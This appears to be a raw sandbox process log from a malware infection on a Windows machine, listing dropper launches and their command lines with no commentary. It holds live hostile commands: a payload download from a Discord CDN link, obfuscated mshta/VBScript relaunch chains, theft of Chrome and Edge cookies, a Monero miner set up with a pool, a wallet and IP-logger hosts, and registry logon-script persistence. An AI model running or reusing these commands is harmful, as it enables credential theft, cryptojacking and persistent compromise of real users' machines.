C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe
"C:\Users\Admin\Documents\Gr1qBF8DD5Dpt4Vzo4DacFcs.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3124 -s 276
C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe
"C:\Users\Admin\Documents\BZjDUm4tFr7XJb3S1HdVrMDz.exe" -q
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/random" "9000000" "" "" "" "" "" "" ""
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 3152 -ip 3152
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
"C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe"
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\Documents\f6I3pBrbcTucpuiGuN7jQPmx.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/hideself" "" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe
"C:\Users\Admin\Documents\2OqLhCZhB1J2lBUhFb9Agohl.exe"
C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe
"C:\Users\Admin\Documents\atrLSYVoi8cef007Wc5_rvmQ.exe"
C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe
"C:\Users\Admin\Documents\1PK75Ee7bUR5cLhxwMHcBK4D.exe"
C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe
"C:\Users\Admin\Documents\WUvO9Xb63O1oupFBU1fJHgGX.exe"
C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe
"C:\Users\Admin\Documents\xdwePyVhF3a2vadLaZK8AsAE.exe"
C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe
"C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"
C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe
"C:\Users\Admin\Documents\CnBLlchd7TCDLhvqtxGvhC0e.exe"
C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe
"C:\Users\Admin\Documents\vD2iyS_Ba05Y__H4Qbjqun4a.exe"
C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe
"C:\Users\Admin\Documents\x6Hnh70y97fx0Du2lrfFW9jg.exe"
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 3152 -s 276
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/download" "https://cdn.discordapp.com/attachments/879335227095416884/879627930865639475/DES6_6_6.exe" "DES6_6_6.exe" "" "" "" "" "" ""
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF """" == """" for %j iN (""C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Users\Admin\AppData\Roaming\5981299.exe
"C:\Users\Admin\AppData\Roaming\5981299.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 2808 -ip 2808
C:\Users\Admin\AppData\Roaming\1378248.exe
"C:\Users\Admin\AppData\Roaming\1378248.exe"
C:\Users\Admin\AppData\Roaming\5949319.exe
"C:\Users\Admin\AppData\Roaming\5949319.exe"
C:\Program Files (x86)\Company\NewProduct\customer3.exe
"C:\Program Files (x86)\Company\NewProduct\customer3.exe"
C:\Users\Admin\AppData\Roaming\3166452.exe
"C:\Users\Admin\AppData\Roaming\3166452.exe"
C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "" == "" for %j iN ("C:\Users\Admin\Documents\mUtXfmRxIl2lXYs36EcxefSC.exe" ) do taskkill -im "%~NXj" -f
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 2456 -ip 2456
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe
"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2456 -s 316
C:\Program Files (x86)\Company\NewProduct\jooyu.exe
"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"
C:\Users\Admin\AppData\Local\Temp\18734\DES6_6_6.exe
DES6_6_6.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-A08VA.tmp\Setup.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe
Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe
C:\Users\Admin\AppData\Local\Temp\C411.tmp\C412.tmp\extd.exe "/sleep" "9000009" "" "" "" "" "" "" ""
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Users\Admin\Documents\jWPHVWYPOdmwbHd9Sxbcg7xA.exe
C:\Windows\SysWOW64\taskkill.exe
taskkill -im "mUtXfmRxIl2lXYs36EcxefSC.exe" -f
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe
"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vBscrIpT: ClOsE (CrEaTeobjeCt ( "WsCRIPt.SHELl"). RUN( "cmD.EXe /C coPy /y ""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo &IF ""-PMrvgB7ejl2YIjc3PC8aTZbo"" == """" for %j iN (""C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe"" ) do taskkill -im ""%~NXj"" -f " , 0, tRue ) )
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-J6JHQ.tmp\Stats.tmp
"C:\Users\Admin\AppData\Local\Temp\is-J6JHQ.tmp\Stats.tmp" /SL5="$202BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 544 -p 4932 -ip 4932
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe
"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 972 -ip 972
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5052 -ip 5052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5052 -s 272
C:\Users\Admin\AppData\Local\Temp\is-GFEPF.tmp\Inlog.tmp
"C:\Users\Admin\AppData\Local\Temp\is-GFEPF.tmp\Inlog.tmp" /SL5="$103B0,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe
"C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 4932 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 972 -s 292
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe
"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
C:\Users\Admin\AppData\Local\Temp\is-JUG2S.tmp\WEATHER Manager.tmp
"C:\Users\Admin\AppData\Local\Temp\is-JUG2S.tmp\WEATHER Manager.tmp" /SL5="$1040A,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\WEATHER Manager.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\is-6LCFO.tmp\MediaBurner2.tmp
"C:\Users\Admin\AppData\Local\Temp\is-6LCFO.tmp\MediaBurner2.tmp" /SL5="$10464,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /C coPy /y "C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" Z2bT94N_CMSE.Exe && START Z2Bt94N_cMSE.eXE -PMrvgB7ejl2YIjc3PC8aTZbo&IF "-PMrvgB7ejl2YIjc3PC8aTZbo" == "" for %j iN ("C:\Users\Admin\AppData\Local\Temp\Z2bT94N_CMSE.Exe" ) do taskkill -im "%~NXj" -f
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe
"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"
C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe
"C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Users\Admin\AppData\Local\Temp\is-B1G14.tmp\VPN.tmp
"C:\Users\Admin\AppData\Local\Temp\is-B1G14.tmp\VPN.tmp" /SL5="$104BE,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\VPN.exe" /Verysilent
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe"
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\A71E.exe
C:\Users\Admin\AppData\Local\Temp\A71E.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 492 -p 1152 -ip 1152
C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe
"C:\Users\Admin\AppData\Local\Temp\is-LBNRK.tmp\ultradumnibour.exe" /S /UID=burnerch2
C:\Users\Admin\AppData\Local\Temp\AD2A.exe
C:\Users\Admin\AppData\Local\Temp\AD2A.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1152 -s 272
C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe
"C:\Program Files (x86)\GameBox INC\GameBox\zhaoy-game.exe" -q
C:\Users\Admin\AppData\Local\Temp\11111.exe
C:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 540 -p 1796 -ip 1796
C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-L59NE.tmp\Setup.tmp" /SL5="$203A8,15170975,270336,C:\Users\Admin\AppData\Local\Temp\is-3CD7D.tmp\Setup.exe" /silent /subid=720
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 1796 -s 292
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5984 -ip 5984
C:\Users\Admin\AppData\Local\Temp\C007.exe
C:\Users\Admin\AppData\Local\Temp\C007.exe
C:\Users\Admin\AppData\Roaming\6196896.exe
"C:\Users\Admin\AppData\Roaming\6196896.exe"
C:\Users\Admin\AppData\Roaming\8683368.exe
"C:\Users\Admin\AppData\Roaming\8683368.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5984 -s 276
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\rundll32.exe
"C:\Windows\System32\rundll32.exe" .\HwWYSzK.F2,zgr
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 5484 -ip 5484
C:\Users\Admin\AppData\Roaming\4252076.exe
"C:\Users\Admin\AppData\Roaming\4252076.exe"
C:\Users\Admin\AppData\Roaming\7488395.exe
"C:\Users\Admin\AppData\Roaming\7488395.exe"
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe
"C:\Program Files (x86)\GameBox INC\GameBox\LivelyScreenRecS1.9.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 1568
C:\Users\Admin\AppData\Roaming\4897513.exe
"C:\Users\Admin\AppData\Roaming\4897513.exe"
C:\Users\Admin\AppData\Local\Temp\D44B.exe
C:\Users\Admin\AppData\Local\Temp\D44B.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe
"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"
C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe
"C:\Program Files (x86)\GameBox INC\GameBox\RuntimeBroker.exe"
C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe
"C:\Users\Admin\AppData\Local\Temp\is-3JGMC.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'
C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe" /quiet SILENT=1 AF=715 BF=715
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 592 -p 1992 -ip 1992
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 1992 -s 2388
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Users\Admin\AppData\Local\Temp\22222.exe
C:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 196 -p 5484 -ip 5484
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 1584
C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe
"C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 612 -p 2992 -ip 2992
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 6296 -ip 6296
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe remove tap0901
C:\Windows\system32\msiexec.exe
C:\Windows\system32\msiexec.exe /V
C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp
"C:\Users\Admin\AppData\Local\Temp\is-79FQO.tmp\Setup.tmp" /SL5="$30342,17345880,721408,C:\Users\Admin\AppData\Local\Temp\is-JCAQF.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 721
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2992 -s 2444
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6296 -s 288
C:\Users\Admin\AppData\Local\Temp\13C6.exe
C:\Users\Admin\AppData\Local\Temp\13C6.exe
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 416 -p 5484 -ip 5484
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\microsoft.cab -F:* %ProgramData%
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5484 -s 792
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt
C:\Windows\SysWOW64\expand.exe
expand C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\microsoft.cab -F:* C:\ProgramData
C:\Users\Admin\AppData\Local\Temp\tmpF7AF_tmp.exe
"C:\Users\Admin\AppData\Local\Temp\tmpF7AF_tmp.exe"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding 1DB90484A59FEC56C3A2910E1380081A C
C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe
"C:\Users\Admin\Documents\jqJVWOxQTj7NT9C_MSHsGoUZ.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"
C:\Windows\SysWOW64\dllhost.exe
"C:\Windows\System32\dllhost.exe"
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /c cmd < Eravate.wks
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding EED7E5E3D63DF81112AC192882F19BBF C
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -pss -s 532 -p 5760 -ip 5760
C:\Windows\system32\WerFault.exe
C:\Windows\system32\WerFault.exe -u -p 5760 -s 2416
C:\Windows\SysWOW64\cmd.exe
cmd
C:\Windows\SysWOW64\reg.exe
reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f
C:\Windows\SysWOW64\msiexec.exe
"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Weather\Weather 1.0.0\install\FD7DF1F\Weather Installation.msi" /quiet SILENT=1 AF=715 BF=715 AI_SETUPEXEPATH=C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\Setup.exe SETUPEXEDIR=C:\Users\Admin\AppData\Local\Temp\is-V4ULV.tmp\ EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629533762 /quiet SILENT=1 AF=715 BF=715 " AF="715" AI_CONTROL_VISUAL_STYLE="16578540;16578540;14988840;12422912" BF="715"
C:\Windows\syswow64\MsiExec.exe
C:\Windows\syswow64\MsiExec.exe -Embedding F9CFD9ADD76FA026CB908C70EC78FB40
C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe
"C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe" /VERYSILENT
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exe
tapinstall.exe install OemVista.inf tap0901
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe
"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"
C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\vdi_compiler.exe
"C:\Users\Admin\AppData\Local\Temp\is-K2J2G.tmp\{app}\vdi_compiler"
C:\Windows\SysWOW64\cmd.exe
"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=721
C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp
"C:\Users\Admin\AppData\Local\Temp\is-5FDGK.tmp\ultramediaburner.tmp" /SL5="$30552,281924,62464,C:\Program Files\Microsoft Office 15\WIJMSTITUY\ultramediaburner.exe" /VERYSILENT
C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe
"C:\Users\Admin\AppData\Local\Temp\cd-ab295-225-721bf-6247042dd1c93\Cyzhaesezhumy.exe"
C:\Windows\SysWOW64\findstr.exe
findstr /V /R "^ULDdlRJfZsbrDapCbeEYycZEgRIWBtYuQhzBPWvHncPJJvLmMbGEuHBnMZeapMOUzsjfZIMBGWAJGfVSyolrbxqpLUPQTrnLHUdspcArKyXpiRSvrlhqBKbYsrEtT$" Una.wks
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe
"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu
C:\Users\Admin\AppData\Local\Temp\d6-2f696-53d-8b19b-59ca5cc2fd2e7\SHihuxyveny.exe
"C:\Users\Admin\AppData\Local\Temp\d6-2f696-53d-8b19b-59ca5cc2fd2e7\SHihuxyveny.exe"
C:\Windows\SysWOW64\PING.EXE
ping YJTUIPJF -n 30
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
Esplorarne.exe.com i
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 548 -p 5268 -ip 5268
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 5268 -s 280
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 6232 -ip 6232
C:\Users\Admin\Documents\A3GGpMpS6S9hakt7JcJSyVEx.exe
"C:\Users\Admin\Documents\A3GGpMpS6S9hakt7JcJSyVEx.exe"
C:\Users\Admin\Documents\bXNU58dHWxashzCg93wqTRhx.exe
"C:\Users\Admin\Documents\bXNU58dHWxashzCg93wqTRhx.exe"
C:\Users\Admin\Documents\X8VnAVbYWRXEweKGtwdgU_7W.exe
"C:\Users\Admin\Documents\X8VnAVbYWRXEweKGtwdgU_7W.exe"
C:\Users\Admin\Documents\F5zhmkNqfMz3CXMZkPNdCC5u.exe
"C:\Users\Admin\Documents\F5zhmkNqfMz3CXMZkPNdCC5u.exe"
C:\Users\Admin\Documents\Exkm2VeAf9GYWZX6GI4iR5Y3.exe
"C:\Users\Admin\Documents\Exkm2VeAf9GYWZX6GI4iR5Y3.exe"
C:\Users\Admin\Documents\aXzr2HlmBytsRxKAGPwf2IKv.exe
"C:\Users\Admin\Documents\aXzr2HlmBytsRxKAGPwf2IKv.exe"
C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe
"C:\Users\Admin\Documents\BgqdkscODKWLHjfKwt55fbd5.exe"
C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe
"C:\Users\Admin\Documents\gME0eA3zT4JpUhNFDSj_8PdB.exe"
C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe
"C:\Users\Admin\Documents\AU2doFY4OThwjD52g0RzGvvu.exe"
C:\Users\Admin\Documents\rAoBOEewvs2ao1uDnMy9qoId.exe
"C:\Users\Admin\Documents\rAoBOEewvs2ao1uDnMy9qoId.exe"
C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe
"C:\Users\Admin\Documents\GU6cMA2h_Nn8pm7KLmwHIqzD.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 6232 -s 2448
C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe
"C:\Users\Admin\Documents\IYj4VNGTqK4xxMUpFyjLGAgC.exe"
C:\Users\Admin\Documents\jSSzEbguafkdZ215jdnrj8RO.exe
"C:\Users\Admin\Documents\jSSzEbguafkdZ215jdnrj8RO.exe"
C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe
"C:\Users\Admin\Documents\TOrlUfw8Pg3PdDGgJracYWeT.exe"
C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe
"C:\Users\Admin\Documents\FDmp1Bj4S03mI1BrOyUPOUKY.exe"
C:\Users\Admin\Documents\tyAtrIBspdV4IxKIk07MutTX.exe
"C:\Users\Admin\Documents\tyAtrIBspdV4IxKIk07MutTX.exe"
C:\Windows\System32\Conhost.exe
\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe
"C:\Users\Admin\Documents\5YJz1sN3WcARkkKdi401MNKQ.exe"
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com
C:\Users\Admin\AppData\Local\Temp\7ZipSfx.000\Esplorarne.exe.com i
